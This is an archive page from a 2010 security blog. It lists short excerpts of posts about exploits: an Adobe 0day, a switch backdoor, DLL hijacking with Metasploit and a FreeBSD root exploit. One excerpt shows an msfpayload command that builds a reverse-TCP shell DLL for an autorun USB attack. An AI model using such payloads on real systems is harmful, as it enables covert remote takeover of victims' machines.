Posts Tagged ‘exploit’

New Adobe 0day Demonstration

Posted: 9th September 2010 by Matt in hacks, news, security
Tags: , , , , , , , , ,
20

I haven’t seen anyone do a writeup of an actual exploitation of this 0day yet, so I figured now would be a good time, since it’s getting so much publicity. It has just been announced that this is actively being exploited in the wild, which definitely makes it more serious than it was a day [...]

Backdoor Password in Accton Based Switches

Posted: 2nd September 2010 by Matt in code, hacks, security
Tags: , , , , , , , , , , , , , , , , ,
9

This just came across and it’s pretty interesting. I haven’t heard of/seen this before, so I figured I’d repost it here. I don’t usually like to regurgitate stuff, but if I have nothing to write myself and I come across something that I consider to be valuable, interesting, insightful, or whatever, I will. [BEGIN REGURGITATION [...]

Autorun DLL Hijacker (USB stick)

Posted: 26th August 2010 by Matt in code, hacks, security
Tags: , , , , , , , , ,
11

I decided that it might be useful to be able to utilize DLL hijacking with Autorun.. here’s the outcome. # msfpayload windows/shell/reverse_tcp LHOST=192.168.0.58 D > /media/KINGSTON/wab32res.dll Created by msfpayload (http://www.metasploit.com). Payload: windows/shell/reverse_tcp Length: 290 Options: LHOST=192.168.0.58

Video Demo of DLL Hijacking Attack.

Posted: 26th August 2010 by Matt in hacks, security
Tags: , , , , , , , ,
1

This is a quick video demonstrating the “webdav_dll_hijacker” Metasploit module. In this video, I target Windows Address Book (.vcf/wab32res.dll) (Best viewed in fullscreen mode in 480p or higher. Youtube absolutely killed the video quality. Thanks Youtube!) Just to make sure this is clear.. the window on the left side of the screen is my Linux [...]

DLLHijackAuditKit v2

Posted: 25th August 2010 by Matt in hacks, news, security
Tags: , , , , , , , , , , , ,
0

HD Moore (Metasploit) has just released an update to his original DLLHiJackAuditKit which further automates the process of discovering programs which are vulnerable to this attack. You can find his post here And here is the direct link to the zip file.

New DLL Hijacking Exploits (many!)

Posted: 24th August 2010 by Matt in code, hacks, news, security
Tags: , , , , , , , , , , , , , , , , , , ,
7

So, for those of you who do not follow the Metasploit project as closely as others, there was a new module included in the 10125 revision which came out on Monday. This module is kind of a huge deal, because it affects many, many Windows programs. I’ll demonstrate one in this post, but if you [...]

FreeBSD 8.*, 7.* Local ‘root’ Exploit

Posted: 19th August 2010 by Matt in code, hacks, security
Tags: , , , , , , , , ,
0

This came across on Full Disclosure. Here is the exploit in action along with the source code:

Wireless Threats and Practical Exploits

Posted: 11th August 2010 by Matt in hacks, security, social engineering
Tags: , , , , , , , , , , , , , , , ,
20

I want to start by saying that this document is not new. It’s floated around the internet for awhile, but it’s still very, very relevant. It discusses various different wireless threats (802.11, Bluetooth, et. al) and some easily executed exploits to attack these protocols. I think anyone who reads my blog is already very, very [...]

Older Entries